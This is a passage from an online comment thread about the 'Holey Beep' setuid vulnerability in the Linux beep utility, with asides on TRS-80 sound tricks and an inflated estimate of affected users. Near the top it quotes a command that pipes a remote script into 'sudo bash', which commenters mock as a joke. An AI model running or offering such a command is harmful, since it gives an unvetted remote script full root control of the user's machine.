    Please run this command to find out: curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash
    If your computer is vulnerable it will beep.

    Anyone who would actually run that command has an even bigger security hole between his ears.

    1. Re: bigger security hole by Anonymous Coward · · Score: 0

      You misunderstand. Only run this as root so the proper security. e.g file permissions can be locked down by the script as it runs.

  23. Why setuid root?? by schweini · · Score: 1

    According to the FAQ, beep has to be installed as setuid root for this to work.
    Why the heck would beep need root? I'm guessing in order to access the hardware, but that's what we are supposed to have HALs for?

  24. Beep music by Anonymous Coward · · Score: 0

    Beep. Ha. You kids today and your conveniences.

    My first computer was a TRS-80.

    It didn't have a sound generator, but it did have a not very well shielded cassette drive.
    You could hand assemble a program and POKE it into memory from BASIC to turn the cassette on and off, which caused interference in the AM range.

    Put an AM radio nearby and voilà: music and various sound effects.

  25. Millions "affected" by paulpach · · Score: 1

    From their website:

    "How many people are affected?
    Millions! Everyone, almost.
    According to the Debian popularity contest, beep is installed on 1.86% of all machines. Extrapolating that by the earth population, we estimate roughly 130 million affected users."

    130 million is probably an order of magnitude bigger than all Debian users. That extrapolation is ridiculous. Is this supposed to be a tongue in cheek number?

    1. Re:Millions "affected" by Anonymous Coward · · Score: 0

      Yes, it is supposed to be a tongue-in-cheek number along with a good portion of the rest of that page. Especially the process used to determine the need for a name, a logo, and a web page. Glorious.

  26. Pennywise by Anonymous Coward · · Score: 0

    Beep beep, Richie!